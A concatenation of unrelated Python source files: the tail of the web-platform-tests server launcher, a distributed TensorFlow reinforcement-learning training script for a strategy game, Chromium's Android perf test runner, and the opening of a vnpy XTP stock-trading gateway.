bind_address=bind_address, config=config, use_ssl=True, key_file=config.ssl_config["key_path"], certificate=config.ssl_config["cert_path"], encrypt_after_connect=config.ssl_config["encrypt_after_connect"], latency=kwargs.get("latency"), http2=True) except Exception: startup_failed() class WebSocketDaemon(object): def __init__(self, host, port, doc_root, handlers_root, bind_address, ssl_config): self.host = host cmd_args = ["-p", port, "-d", doc_root, "-w", handlers_root] if ssl_config is not None: cmd_args += ["--tls", "--private-key", ssl_config["key_path"], "--certificate", ssl_config["cert_path"]] if (bind_address): cmd_args = ["-H", host] + cmd_args opts, args = pywebsocket._parse_args_and_config(cmd_args) opts.cgi_directories = [] opts.is_executable_method = None self.server = pywebsocket.WebSocketServer(opts) ports = [item[0].getsockname()[1] for item in self.server._sockets] if not ports: # TODO: Fix the logging configuration in WebSockets processes # see https://github.com/web-platform-tests/wpt/issues/22719 print("Failed to start websocket server on port %s, " "is something already using that port?" % port, file=sys.stderr) raise OSError() assert all(item == ports[0] for item in ports) self.port = ports[0] self.started = False self.server_thread = None def start(self, block=False): self.started = True if block: self.server.serve_forever() else: self.server_thread = threading.Thread(target=self.server.serve_forever) self.server_thread.setDaemon(True) # don't hang on exit self.server_thread.start() def stop(self): """ Stops the server. If the server is not running, this method has no effect. """ if self.started: try: self.server.shutdown() self.server.server_close() self.server_thread.join() self.server_thread = None except AttributeError: pass self.started = False self.server = None def release_mozlog_lock(): try: from mozlog.structuredlog import StructuredLogger try: StructuredLogger._lock.release() except threading.ThreadError: pass except ImportError: pass def start_ws_server(host, port, paths, routes, bind_address, config, **kwargs): # Ensure that when we start this in a new process we have the global lock # in the logging module unlocked reload_module(logging) release_mozlog_lock() try: return WebSocketDaemon(host, str(port), repo_root, config.paths["ws_doc_root"], bind_address, ssl_config=None) except Exception: startup_failed(log=False) def start_wss_server(host, port, paths, routes, bind_address, config, **kwargs): # Ensure that when we start this in a new process we have the global lock # in the logging module unlocked reload_module(logging) release_mozlog_lock() try: return WebSocketDaemon(host, str(port), repo_root, config.paths["ws_doc_root"], bind_address, config.ssl_config) except Exception: startup_failed(log=False) class QuicTransportDaemon(object): def __init__(self, host, port, handlers_path=None, private_key=None, certificate=None, log_level=None): args = ["python3", "wpt", "serve-quic-transport"] if host: args += ["--host", host] if port: args += ["--port", str(port)] if private_key: args += ["--private-key", private_key] if certificate: args += ["--certificate", certificate] if handlers_path: args += ["--handlers-path", handlers_path] if log_level == "debug": args += ["--verbose"] self.command = args self.proc = None def start(self, block=False): if block: subprocess.call(self.command) else: def handle_signal(*_): if self.proc: try: self.proc.terminate() except OSError: # It's fine if the child already exits. pass self.proc.wait() sys.exit(0) signal.signal(signal.SIGTERM, handle_signal) signal.signal(signal.SIGINT, handle_signal) self.proc = subprocess.Popen(self.command) # Give the server a second to start and then check. time.sleep(1) if self.proc.poll(): sys.exit(1) def start_quic_transport_server(host, port, paths, routes, bind_address, config, **kwargs): # Ensure that when we start this in a new process we have the global lock # in the logging module unlocked reload_module(logging) release_mozlog_lock() try: return QuicTransportDaemon(host, port, private_key=config.ssl_config["key_path"], certificate=config.ssl_config["cert_path"], log_level=config.log_level) except Exception: startup_failed(log=False) def start(config, routes, **kwargs): host = config["server_host"] ports = config.ports paths = config.paths bind_address = config["bind_address"] logger.debug("Using ports: %r" % ports) servers = start_servers(host, ports, paths, routes, bind_address, config, **kwargs) return servers def iter_procs(servers): for servers in servers.values(): for port, server in servers: yield server.proc def _make_subdomains_product(s, depth=2): return {u".".join(x) for x in chain(*(product(s, repeat=i) for i in range(1, depth+1)))} def _make_origin_policy_subdomains(limit): return {u"op%d" % x for x in range(1,limit+1)} _subdomains = {u"www", u"www1", u"www2", u"天気の良い日", u"élève"} _not_subdomains = {u"nonexistent"} _subdomains = _make_subdomains_product(_subdomains) # Origin policy subdomains need to not be reused by any other tests, since origin policies have # origin-wide impacts like installing a CSP or Feature Policy that could interfere with features # under test. # See https://github.com/web-platform-tests/rfcs/pull/44. _subdomains |= _make_origin_policy_subdomains(99) _not_subdomains = _make_subdomains_product(_not_subdomains) class ConfigBuilder(config.ConfigBuilder): """serve config This subclasses wptserve.config.ConfigBuilder to add serve config options. """ _default = { "browser_host": "web-platform.test", "alternate_hosts": { "alt": "not-web-platform.test" }, "doc_root": repo_root, "ws_doc_root": os.path.join(repo_root, "websockets", "handlers"), "server_host": None, "ports": { "http": [8000, "auto"], "https": [8443, 8444], "ws": ["auto"], "wss": ["auto"], }, "check_subdomains": True, "log_level": "debug", "bind_address": True, "ssl": { "type": "pregenerated", "encrypt_after_connect": False, "openssl": { "openssl_binary": "openssl", "base_path": "_certs", "password": "web-platform-tests", "force_regenerate": False, "duration": 30, "base_conf_path": None }, "pregenerated": { "host_key_path": os.path.join(repo_root, "tools", "certs", "web-platform.test.key"), "host_cert_path": os.path.join(repo_root, "tools", "certs", "web-platform.test.pem") }, "none": {} }, "aliases": [] } computed_properties = ["ws_doc_root"] + config.ConfigBuilder.computed_properties def __init__(self, *args, **kwargs): if "subdomains" not in kwargs: kwargs["subdomains"] = _subdomains if "not_subdomains" not in kwargs: kwargs["not_subdomains"] = _not_subdomains super(ConfigBuilder, self).__init__( *args, **kwargs ) with self as c: browser_host = c.get("browser_host") alternate_host = c.get("alternate_hosts", {}).get("alt") if not domains_are_distinct(browser_host, alternate_host): raise ValueError( "Alternate host must be distinct from browser host" ) def _get_ws_doc_root(self, data): if data["ws_doc_root"] is not None: return data["ws_doc_root"] else: return os.path.join(data["doc_root"], "websockets", "handlers") def ws_doc_root(self, v): self._ws_doc_root = v ws_doc_root = property(None, ws_doc_root) def _get_paths(self, data): rv = super(ConfigBuilder, self)._get_paths(data) rv["ws_doc_root"] = data["ws_doc_root"] return rv def build_config(override_path=None, config_cls=ConfigBuilder, **kwargs): rv = config_cls() enable_http2 = kwargs.get("h2") if enable_http2 is None: enable_http2 = True if enable_http2: rv._default["ports"]["h2"] = [9000] if override_path and os.path.exists(override_path): with open(override_path) as f: override_obj = json.load(f) rv.update(override_obj) if kwargs.get("config_path"): other_path = os.path.abspath(os.path.expanduser(kwargs.get("config_path"))) if os.path.exists(other_path): with open(other_path) as f: override_obj = json.load(f) rv.update(override_obj) else: raise ValueError("Config path %s does not exist" % other_path) overriding_path_args = [("doc_root", "Document root"), ("ws_doc_root", "WebSockets document root")] for key, title in overriding_path_args: value = kwargs.get(key) if value is None: continue value = os.path.abspath(os.path.expanduser(value)) if not os.path.exists(value): raise ValueError("%s path %s does not exist" % (title, value)) setattr(rv, key, value) return rv def get_parser(): parser = argparse.ArgumentParser() parser.add_argument("--latency", type=int, help="Artificial latency to add before sending http responses, in ms") parser.add_argument("--config", action="store", dest="config_path", help="Path to external config file") parser.add_argument("--doc_root", action="store", dest="doc_root", help="Path to document root. Overrides config.") parser.add_argument("--ws_doc_root", action="store", dest="ws_doc_root", help="Path to WebSockets document root. Overrides config.") parser.add_argument("--alias_file", action="store", dest="alias_file", help="File with entries for aliases/multiple doc roots. In form of `/ALIAS_NAME/, DOC_ROOT\\n`") parser.add_argument("--h2", action="store_true", dest="h2", default=None, help=argparse.SUPPRESS) parser.add_argument("--no-h2", action="store_false", dest="h2", default=None, help="Disable the HTTP/2.0 server") parser.add_argument("--quic-transport", action="store_true", help="Enable QUIC server for WebTransport") parser.add_argument("--exit-after-start", action="store_true", help="Exit after starting servers") parser.set_defaults(report=False) parser.set_defaults(is_wave=False) return parser def run(config_cls=ConfigBuilder, route_builder=None, **kwargs): received_signal = threading.Event() with build_config(os.path.join(repo_root, "config.json"), config_cls=config_cls, **kwargs) as config: global logger logger = config.logger set_logger(logger) # Configure the root logger to cover third-party libraries. logging.getLogger().setLevel(config.log_level) def handle_signal(signum, frame): logger.debug("Received signal %s. Shutting down.", signum) received_signal.set() bind_address = config["bind_address"] if kwargs.get("alias_file"): with open(kwargs["alias_file"], 'r') as alias_file: for line in alias_file: alias, doc_root = [x.strip() for x in line.split(',')] config["aliases"].append({ 'url-path': alias, 'local-dir': doc_root, }) if route_builder is None: route_builder = get_route_builder routes = route_builder(config.aliases, config).get_routes() if config["check_subdomains"]: check_subdomains(config, routes) stash_address = None if bind_address: stash_address = (config.server_host, get_port("")) logger.debug("Going to use port %d for stash" % stash_address[1]) with stash.StashServer(stash_address, authkey=str(uuid.uuid4())): servers = start(config, routes, **kwargs) signal.signal(signal.SIGTERM, handle_signal) signal.signal(signal.SIGINT, handle_signal) while (all(subproc.is_alive() for subproc in iter_procs(servers)) and not received_signal.is_set() and not kwargs["exit_after_start"]): for subproc in iter_procs(servers): subproc.join(1) failed_subproc = 0 for subproc in iter_procs(servers): if subproc.is_alive(): logger.info('Status of subprocess "%s": running' % subproc.name) else: if subproc.exitcode == 0: logger.info('Status of subprocess "%s": exited correctly' % subproc.name) else: logger.warning('Status of subprocess "%s": failed. Exit with non-zero status: %d' % (subproc.name, subproc.exitcode)) failed_subproc += 1 return failed_subproc def main(): kwargs = vars(get_parser().parse_args()) return run(**kwargs)
train_in_thought_game_add_bn.py
from __future__ import absolute_import from __future__ import division from __future__ import print_function USED_DEVICES = "0,1" import os os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" os.environ["CUDA_VISIBLE_DEVICES"] = USED_DEVICES import sys import threading import time import tensorflow as tf import multiprocessing as mp import numpy as np from logging import warning as logging from datetime import datetime from mini_network_add_bn import MiniNetwork from mini_agent_add_bn import MiniAgent from strategy.terran_agent import DummyTerran from unit.units import Army from lib.replay_buffer import Buffer from strategy_env import SimulatePlatform from absl import app from absl import flags import unit.protoss_unit as P import unit.terran_unit as T FLAGS = flags.FLAGS flags.DEFINE_bool("debug_mode", False, "Whether is debuging") flags.DEFINE_integer("num_for_update", 500, "How many episodes for one iteration") flags.DEFINE_integer("train_iters", 30, "How many iterations for one training") flags.DEFINE_integer("parallel", 10, "How many process to run, debug set to 1, training set to 10") flags.DEFINE_integer("thread_num", 5, "How many threads in one process, debug set to 1, training set to 5") flags.DEFINE_integer("port_num", 5370, "Port number for distribute training in tensorflow") flags.DEFINE_string("restore_model_path", "./model/20200825-101942_mini/", "path for restore model") flags.DEFINE_bool("restore_model", False, "Whether to restore old model") flags.DEFINE_string("restore_from", "mini", "mini (for Thought-Game) or source (for Real game)") flags.DEFINE_string("restore_to", "mini", "mini (for Thought-Game) or source (for Real game)") flags.DEFINE_bool("freeze_head", False, "Whether freeze_head train agents.") flags.DEFINE_bool("use_bn", True, "Whether use batch_norm to training.") flags.DEFINE_bool("use_sep_net", True, "Whether use seperate network for policy and value model.") flags.DEFINE_integer("max_agent_steps", 100, "Total agent steps.") flags.DEFINE_integer("max_distance", 5, "Max distance between blue and red one") flags.DEFINE_integer("initial_diff", 1, "The start level of opponent in mind-game") flags.DEFINE_float("win_rate_threshold", 0.95, "If win_rate exceeds this value, opponent level increase one") flags.DEFINE_bool("show_details", False, "Weather to show details of one mind-game, debug set to True, training set to False") FLAGS(sys.argv) # define some global variable UPDATE_EVENT, ROLLING_EVENT = threading.Event(), threading.Event() Counter = 0 Waiting_Counter = 0 Update_Counter = 0 Result_List = [] SERVER_DICT = {"worker": [], "ps": []} if FLAGS.debug_mode: PARALLEL = 1 THREAD_NUM = 1 MAX_AGENT_STEPS = 100 NUM_FOR_UPDATE = 1 TRAIN_ITERS = 1 DISTANCE = FLAGS.max_distance PORT_NUM = FLAGS.port_num else: PARALLEL = FLAGS.parallel THREAD_NUM = FLAGS.thread_num MAX_AGENT_STEPS = FLAGS.max_agent_steps NUM_FOR_UPDATE = FLAGS.num_for_update TRAIN_ITERS = FLAGS.train_iters DISTANCE = FLAGS.max_distance PORT_NUM = FLAGS.port_num INITIAL_DIFF = FLAGS.initial_diff WIN_RATE_THRESHOLD = FLAGS.win_rate_threshold SHOW_DETAILS = FLAGS.show_details def run_thread(agent, game_num, Synchronizer, difficulty): global UPDATE_EVENT, ROLLING_EVENT, Counter, Waiting_Counter, Update_Counter, Result_List num = 0 proc_name = mp.current_process().name blue_agent = DummyTerran(diff=difficulty) blue_agent.get_power() env = SimulatePlatform(red_agent=agent, blue_agent=blue_agent, distance=DISTANCE, max_steps=MAX_AGENT_STEPS) env.init() agent.set_env(env) while True: env.simulate(FLAGS.debug_mode) if True: # check if the num of episodes is enough to update num += 1 Counter += 1 reward = agent.result Result_List.append(reward) logging("(diff: %d) %d epoch: %s get %d/%d episodes! return: %f!" % (int(difficulty), Update_Counter, proc_name, len(Result_List), game_num * THREAD_NUM, reward)) # time for update if num == game_num: num = 0 ROLLING_EVENT.clear() # worker stops rolling, wait for update if agent.agent_id != 0 and THREAD_NUM > 1: Waiting_Counter += 1 if Waiting_Counter == THREAD_NUM - 1: # wait for all the workers stop UPDATE_EVENT.set() ROLLING_EVENT.wait() # update! else: if THREAD_NUM > 1: UPDATE_EVENT.wait() Synchronizer.wait() # wait for other processes to update agent.update_network(Result_List) Result_List.clear() agent.global_buffer.reset() Synchronizer.wait() Update_Counter += 1 # finish update UPDATE_EVENT.clear() Waiting_Counter = 0 ROLLING_EVENT.set() win_rate = agent.net.get_win_rate() if win_rate > WIN_RATE_THRESHOLD: difficulty += 1 env.blue_agent.set_diff(difficulty) print('Increase difficulty to:', difficulty) env.reset() def Worker(index, update_game_num, Synchronizer, cluster, model_path): print("Worker !") config = tf.ConfigProto( allow_soft_placement=True, log_device_placement=False, ) config.gpu_options.allow_growth = True worker = tf.train.Server(cluster, job_name="worker", task_index=index, config=config) #config.gpu_options.per_process_gpu_memory_fraction = 0.2 sess = tf.Session(target=worker.target, config=config) print("MiniNetwork !") mini_net = MiniNetwork(sess, index=index, summary_writer=None, rl_training=True, cluster=cluster, ppo_load_path=FLAGS.restore_model_path, ppo_save_path=model_path, freeze_head=FLAGS.freeze_head, use_bn=FLAGS.use_bn, use_sep_net=FLAGS.use_sep_net, restore_model=FLAGS.restore_model, restore_from=FLAGS.restore_from, restore_to=FLAGS.restore_to) global_buffer = Buffer() agents = [] for i in range(THREAD_NUM): agent = MiniAgent(agent_id=i, global_buffer=global_buffer, net=mini_net, restore_model=FLAGS.restore_model) agents.append(agent) print("Worker %d: waiting for cluster connection..." % index) sess.run(tf.report_uninitialized_variables()) print("Worker %d: cluster ready!" % index) while len(sess.run(tf.report_uninitialized_variables())): print("Worker %d: waiting for variable initialization..." % index) time.sleep(1) print("Worker %d: variables initialized" % index) game_num = np.ceil(update_game_num // THREAD_NUM) UPDATE_EVENT.clear() ROLLING_EVENT.set() difficulty = INITIAL_DIFF # Run threads threads = [] for i in range(THREAD_NUM - 1): t = threading.Thread(target=run_thread, args=(agents[i], game_num, Synchronizer, difficulty)) threads.append(t) t.daemon = True t.start() time.sleep(3) run_thread(agents[-1], game_num, Synchronizer, difficulty) for t in threads: t.join() def Parameter_Server(Synchronizer, cluster, log_path, model_path, procs): print("Parameter_Server !") config = tf.ConfigProto( allow_soft_placement=True, log_device_placement=False, ) config.gpu_options.allow_growth = True server = tf.train.Server(cluster, job_name="ps", task_index=0, config=config) #config.gpu_options.per_process_gpu_memory_fraction = 0.2 sess = tf.Session(target=server.target, config=config) summary_writer = tf.summary.FileWriter(log_path) mini_net = MiniNetwork(sess, index=0, summary_writer=summary_writer, rl_training=True, cluster=cluster, ppo_load_path=FLAGS.restore_model_path, ppo_save_path=model_path, freeze_head=FLAGS.freeze_head, use_bn=FLAGS.use_bn, use_sep_net=FLAGS.use_sep_net, restore_model=FLAGS.restore_model, restore_from=FLAGS.restore_from, restore_to=FLAGS.restore_to) agent = MiniAgent(agent_id=-1, global_buffer=Buffer(), net=mini_net, restore_model=FLAGS.restore_model) print("Parameter server: waiting for cluster connection...") sess.run(tf.report_uninitialized_variables()) print("Parameter server: cluster ready!") print("Parameter server: initializing variables...") agent.init_network() print("Parameter server: variables initialized") last_win_rate = 0. update_counter = 0 while update_counter < TRAIN_ITERS: agent.reset_old_network() # wait for update Synchronizer.wait() logging("Update Network!") # TODO count the time , compare cpu and gpu time.sleep(1) # update finish Synchronizer.wait() logging("Update Network finished!") steps, win_rate = agent.update_summary(update_counter) logging("Steps: %d, win rate: %f" % (steps, win_rate)) update_counter += 1 if win_rate >= last_win_rate: agent.save_model() last_win_rate = win_rate for p in procs: print('Process terminate') p.terminate() if __name__ == "__main__": # create distribute tf cluster start_port = PORT_NUM SERVER_DICT["ps"].append("localhost:%d" % start_port) for i in range(PARALLEL): SERVER_DICT["worker"].append("localhost:%d" % (start_port + 1 + i)) Cluster = tf.train.ClusterSpec(SERVER_DICT) now = datetime.now() model_path = "./model/" + now.strftime("%Y%m%d-%H%M%S") + "_mini/" if not os.path.exists(model_path): os.makedirs(model_path) LOG = "./logs/" + now.strftime("%Y%m%d-%H%M%S") + "_mini/" UPDATE_GAME_NUM = NUM_FOR_UPDATE per_update_num = np.ceil(UPDATE_GAME_NUM / PARALLEL) print("Hello !") Synchronizer = mp.Barrier(PARALLEL + 1) # Run parallel process procs = [] for index in range(PARALLEL): p = mp.Process(name="Worker_%d" % index, target=Worker, args=(index, per_update_num, Synchronizer, Cluster, model_path)) procs.append(p) p.daemon = True p.start() time.sleep(1) Parameter_Server(Synchronizer, Cluster, LOG, model_path, procs) for p in procs: print('Process join') p.join()
test_runner.py
# Copyright 2013 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Runs perf tests. Our buildbot infrastructure requires each slave to run steps serially. This is sub-optimal for android, where these steps can run independently on multiple connected devices. The buildbots will run this script multiple times per cycle: - First: all steps listed in --steps in will be executed in parallel using all connected devices. Step results will be pickled to disk. Each step has a unique name. The result code will be ignored if the step name is listed in --flaky-steps. The buildbot will treat this step as a regular step, and will not process any graph data. - Then, with -print-step STEP_NAME: at this stage, we'll simply print the file with the step results previously saved. The buildbot will then process the graph data accordingly. The JSON steps file contains a dictionary in the format: { "version": int, "steps": { "foo": { "device_affinity": int, "cmd": "script_to_execute foo" }, "bar": { "device_affinity": int, "cmd": "script_to_execute bar" } } } The JSON flaky steps file contains a list with step names which results should be ignored: [ "step_name_foo", "step_name_bar" ] Note that script_to_execute necessarily have to take at least the following option: --device: the serial number to be passed to all adb commands. """ import collections import datetime import json import logging import os import pickle import shutil import sys import tempfile import threading import time from pylib import cmd_helper from pylib import constants from pylib import forwarder from pylib.base import base_test_result from pylib.base import base_test_runner from pylib.device import battery_utils from pylib.device import device_errors def GetPersistedResult(test_name): file_name = os.path.join(constants.PERF_OUTPUT_DIR, test_name) if not os.path.exists(file_name): logging.error('File not found %s', file_name) return None with file(file_name, 'r') as f: return pickle.loads(f.read()) def OutputJsonList(json_input, json_output): with file(json_input, 'r') as i: all_steps = json.load(i) step_values = [] for k, v in all_steps['steps'].iteritems(): data = {'test': k, 'device_affinity': v['device_affinity']} persisted_result = GetPersistedResult(k) if persisted_result: data['total_time'] = persisted_result['total_time'] step_values.append(data) with file(json_output, 'w') as o: o.write(json.dumps(step_values)) return 0 def PrintTestOutput(test_name, json_file_name=None): """Helper method to print the output of previously executed test_name. Args: test_name: name of the test that has been previously executed. json_file_name: name of the file to output chartjson data to. Returns: exit code generated by the test step. """ persisted_result = GetPersistedResult(test_name) if not persisted_result: return 1 logging.info('*' * 80) logging.info('Output from:') logging.info(persisted_result['cmd']) logging.info('*' * 80) print persisted_result['output'] if json_file_name: with file(json_file_name, 'w') as f: f.write(persisted_result['chartjson']) return persisted_result['exit_code'] def PrintSummary(test_names): logging.info('*' * 80) logging.info('Sharding summary') device_total_time = collections.defaultdict(int) for test_name in test_names: file_name = os.path.join(constants.PERF_OUTPUT_DIR, test_name) if not os.path.exists(file_name): logging.info('%s : No status file found', test_name) continue with file(file_name, 'r') as f: result = pickle.loads(f.read()) logging.info('%s : exit_code=%d in %d secs at %s', result['name'], result['exit_code'], result['total_time'], result['device']) device_total_time[result['device']] += result['total_time'] for device, device_time in device_total_time.iteritems(): logging.info('Total for device %s : %d secs', device, device_time) logging.info('Total steps time: %d secs', sum(device_total_time.values())) class _HeartBeatLogger(object): # How often to print the heartbeat on flush(). _PRINT_INTERVAL = 30.0 def __init__(self): """A file-like class for keeping the buildbot alive.""" self._len = 0 self._tick = time.time() self._stopped = threading.Event() self._timer = threading.Thread(target=self._runner) self._timer.start() def _runner(self): while not self._stopped.is_set(): self.flush() self._stopped.wait(_HeartBeatLogger._PRINT_INTERVAL) def write(self, data): self._len += len(data) def flush(self): now = time.time() if now - self._tick >= _HeartBeatLogger._PRINT_INTERVAL: self._tick = now print '--single-step output length %d' % self._len sys.stdout.flush() def stop(self): self._stopped.set() class TestRunner(base_test_runner.BaseTestRunner): def __init__(self, test_options, device, shard_index, max_shard, tests, flaky_tests): """A TestRunner instance runs a perf test on a single device. Args: test_options: A PerfOptions object. device: Device to run the tests. shard_index: the index of this device. max_shards: the maximum shard index. tests: a dict mapping test_name to command. flaky_tests: a list of flaky test_name. """ super(TestRunner, self).__init__(device, None) self._options = test_options self._shard_index = shard_index self._max_shard = max_shard self._tests = tests self._flaky_tests = flaky_tests self._output_dir = None self._device_battery = battery_utils.BatteryUtils(self.device) @staticmethod def _IsBetter(result): if result['actual_exit_code'] == 0: return True pickled = os.path.join(constants.PERF_OUTPUT_DIR, result['name']) if not os.path.exists(pickled): return True with file(pickled, 'r') as f: previous = pickle.loads(f.read()) return result['actual_exit_code'] < previous['actual_exit_code'] @staticmethod def _SaveResult(result): if TestRunner._IsBetter(result): with file(os.path.join(constants.PERF_OUTPUT_DIR, result['name']), 'w') as f: f.write(pickle.dumps(result)) def _CheckDeviceAffinity(self, test_name): """Returns True if test_name has affinity for this shard.""" affinity = (self._tests['steps'][test_name]['device_affinity'] % self._max_shard) if self._shard_index == affinity: return True logging.info('Skipping %s on %s (affinity is %s, device is %s)', test_name, self.device_serial, affinity, self._shard_index) return False def _CleanupOutputDirectory(self): if self._output_dir: shutil.rmtree(self._output_dir, ignore_errors=True) self._output_dir = None def _ReadChartjsonOutput(self): if not self._output_dir: return '' json_output_path = os.path.join(self._output_dir, 'results-chart.json') try: with open(json_output_path) as f: return f.read() except IOError: logging.exception('Exception when reading chartjson.') logging.error('This usually means that telemetry did not run, so it could' ' not generate the file. Please check the device running' ' the test.') return '' def _LaunchPerfTest(self, test_name): """Runs a perf test. Args: test_name: the name of the test to be executed. Returns: A tuple containing (Output, base_test_result.ResultType) """ if not self._CheckDeviceAffinity(test_name): return '', base_test_result.ResultType.PASS try: logging.warning('Unmapping device ports') forwarder.Forwarder.UnmapAllDevicePorts(self.device) self.device.old_interface.RestartAdbdOnDevice() except Exception as e: logging.error('Exception when tearing down device %s', e) cmd = ('%s --device %s' % (self._tests['steps'][test_name]['cmd'], self.device_serial)) if self._options.collect_chartjson_data: self._output_dir = tempfile.mkdtemp() cmd = cmd + ' --output-dir=%s' % self._output_dir logging.info( 'temperature: %s (0.1 C)', str(self._device_battery.GetBatteryInfo().get('temperature'))) if self._options.max_battery_temp: self._device_battery.LetBatteryCoolToTemperature( self._options.max_battery_temp) logging.info('%s : %s', test_name, cmd) start_time = datetime.datetime.now() timeout = self._tests['steps'][test_name].get('timeout', 5400) if self._options.no_timeout: timeout = None logging.info('Timeout for %s test: %s', test_name, timeout) full_cmd = cmd if self._options.dry_run: full_cmd = 'echo %s' % cmd logfile = sys.stdout if self._options.single_step: # Just print a heart-beat so that the outer buildbot scripts won't timeout # without response. logfile = _HeartBeatLogger() cwd = os.path.abspath(constants.DIR_SOURCE_ROOT) if full_cmd.startswith('src/'): cwd = os.path.abspath(os.path.join(constants.DIR_SOURCE_ROOT, os.pardir)) try: exit_code, output = cmd_helper.GetCmdStatusAndOutputWithTimeout( full_cmd, timeout, cwd=cwd, shell=True, logfile=logfile) json_output = self._ReadChartjsonOutput() except cmd_helper.TimeoutError as e: exit_code = -1 output = str(e) json_output = '' finally: self._CleanupOutputDirectory() if self._options.single_step: logfile.stop() end_time = datetime.datetime.now() if exit_code is None: exit_code = -1 logging.info('%s : exit_code=%d in %d secs at %s', test_name, exit_code, (end_time - start_time).seconds, self.device_serial) if exit_code == 0: result_type = base_test_result.ResultType.PASS else: result_type = base_test_result.ResultType.FAIL # Since perf tests use device affinity, give the device a chance to # recover if it is offline after a failure. Otherwise, the master sharder # will remove it from the pool and future tests on this device will fail. try: self.device.WaitUntilFullyBooted(timeout=120) except device_errors.CommandTimeoutError as e: logging.error('Device failed to return after %s: %s' % (test_name, e)) actual_exit_code = exit_code if test_name in self._flaky_tests: # The exit_code is used at the second stage when printing the # test output. If the test is flaky, force to "0" to get that step green # whilst still gathering data to the perf dashboards. # The result_type is used by the test_dispatcher to retry the test. exit_code = 0 persisted_result = { 'name': test_name, 'output': output, 'chartjson': json_output, 'exit_code': exit_code, 'actual_exit_code': actual_exit_code, 'result_type': result_type, 'total_time': (end_time - start_time).seconds, 'device': self.device_serial, 'cmd': cmd, } self._SaveResult(persisted_result) return (output, result_type) def RunTest(self, test_name): """Run a perf test on the device. Args: test_name: String to use for logging the test result. Returns: A tuple of (TestRunResults, retry). """ _, result_type = self._LaunchPerfTest(test_name) results = base_test_result.TestRunResults() results.AddResult(base_test_result.BaseTestResult(test_name, result_type)) retry = None if not results.DidRunPass(): retry = test_name return results, retry
xtp_gateway.py
from typing import Any, Sequence from datetime import datetime from threading import Thread from vnpy.api.xtp.vnxtp import ( XTP, set_async_callback_exception_handler, AsyncDispatchException, OrderBookStruct, XTPMarketDataStruct, XTPQuoteStaticInfo, XTPRspInfoStruct, XTPSpecificTickerStruct, XTPTickByTickStruct, XTPTickerPriceInfo, XTPOrderInsertInfo, XTPOrderInfo, XTPTradeReport, XTPOrderCancelInfo, XTPCrdDebtInfo, XTPQueryStkPositionRsp, XTPQueryAssetRsp, XTPStructuredFundInfo, XTPFundTransferNotice, XTPQueryETFBaseRsp, XTPQueryETFComponentRsp, XTPQueryIPOTickerRsp, XTPQueryIPOQuotaRsp, XTPQueryOptionAuctionInfoRsp, XTP_EXCHANGE_TYPE, XTP_LOG_LEVEL, XTP_PROTOCOL_TYPE, XTP_TE_RESUME_TYPE, XTP_SIDE_BUY, XTP_SIDE_SELL, XTP_SIDE_MARGIN_TRADE, XTP_SIDE_SHORT_SELL, XTP_SIDE_REPAY_MARGIN, XTP_SIDE_REPAY_STOCK, XTP_ACCOUNT_TYPE, XTP_BUSINESS_TYPE, XTP_TICKER_TYPE, XTP_MARKET_TYPE, XTP_PRICE_TYPE, XTP_ORDER_STATUS_TYPE ) from vnpy.event import EventEngine from vnpy.trader.event import EVENT_TIMER from vnpy.trader.constant import Exchange, Product, Direction, OrderType, Status, Offset from vnpy.trader.gateway import BaseGateway from vnpy.trader.object import (CancelRequest, OrderRequest, SubscribeRequest, TickData, ContractData, OrderData, TradeData, PositionData, AccountData) from vnpy.trader.utility import get_folder_path API = XTP.API EXCHANGE_XTP2VT = { XTP_EXCHANGE_TYPE.XTP_EXCHANGE_SH: Exchange.SSE, XTP_EXCHANGE_TYPE.XTP_EXCHANGE_SZ: Exchange.SZSE, } EXCHANGE_VT2XTP = {v: k for k, v in EXCHANGE_XTP2VT.items()} MARKET_XTP2VT = { XTP_MARKET_TYPE.XTP_MKT_SH_A: Exchange.SSE, XTP_MARKET_TYPE.XTP_MKT_SZ_A: Exchange.SZSE } MARKET_VT2XTP = {v: k for k, v in MARKET_XTP2VT.items()} PRODUCT_XTP2VT = { XTP_TICKER_TYPE.XTP_TICKER_TYPE_STOCK: Product.EQUITY, XTP_TICKER_TYPE.XTP_TICKER_TYPE_INDEX: Product.INDEX, XTP_TICKER_TYPE.XTP_TICKER_TYPE_FUND: Product.FUND, XTP_TICKER_TYPE.XTP_TICKER_TYPE_BOND: Product.BOND, XTP_TICKER_TYPE.XTP_TICKER_TYPE_OPTION: Product.OPTION } # DIRECTION_VT2XTP = { # Direction.LONG: XTP_SIDE_BUY, # Direction.SHORT: XTP_SIDE_SELL # } DIRECTION_VT2XTP = { (Direction.LONG, Offset.OPEN): XTP_SIDE_MARGIN_TRADE, (Direction.SHORT, Offset.CLOSE): XTP_SIDE_REPAY_MARGIN, (Direction.SHORT, Offset.OPEN): XTP_SIDE_SHORT_SELL, (Direction.LONG, Offset.CLOSE): XTP_SIDE_REPAY_STOCK, (Direction.SHORT, Offset.NONE): XTP_SIDE_BUY, (Direction.LONG, Offset.NONE): XTP_SIDE_SELL, } DIRECTION_XTP2VT = {v: k for k, v in DIRECTION_VT2XTP.items()} ORDERTYPE_VT2XTP = { OrderType.LIMIT: XTP_PRICE_TYPE.XTP_PRICE_LIMIT, OrderType.MARKET: XTP_PRICE_TYPE.XTP_PRICE_BEST5_OR_CANCEL } ORDERTYPE_XTP2VT = {v: k for k, v in ORDERTYPE_VT2XTP.items()} STATUS_XTP2VT = { XTP_ORDER_STATUS_TYPE.XTP_ORDER_STATUS_INIT: Status.SUBMITTING, XTP_ORDER_STATUS_TYPE.XTP_ORDER_STATUS_ALLTRADED: Status.ALLTRADED, XTP_ORDER_STATUS_TYPE.XTP_ORDER_STATUS_PARTTRADEDQUEUEING: Status.PARTTRADED, XTP_ORDER_STATUS_TYPE.XTP_ORDER_STATUS_PARTTRADEDNOTQUEUEING: Status.CANCELLED, XTP_ORDER_STATUS_TYPE.XTP_ORDER_STATUS_NOTRADEQUEUEING: Status.NOTTRADED, XTP_ORDER_STATUS_TYPE.XTP_ORDER_STATUS_CANCELED: Status.CANCELLED, XTP_ORDER_STATUS_TYPE.XTP_ORDER_STATUS_REJECTED: Status.REJECTED, } symbol_name_map = {} symbol_exchange_map = {} class XtpGateway(BaseGateway): default_setting = { "账号": "", "密码": "", "客户号": 1, "行情地址": "", "行情端口": 0, "交易地址": "", "交易端口": 0, "行情协议": ["TCP", "UDP"], "授权码": "" } exchanges = list(EXCHANGE_VT2XTP.keys()) def __init__(self, event_engine: EventEngine): """""" super().__init__(event_engine, 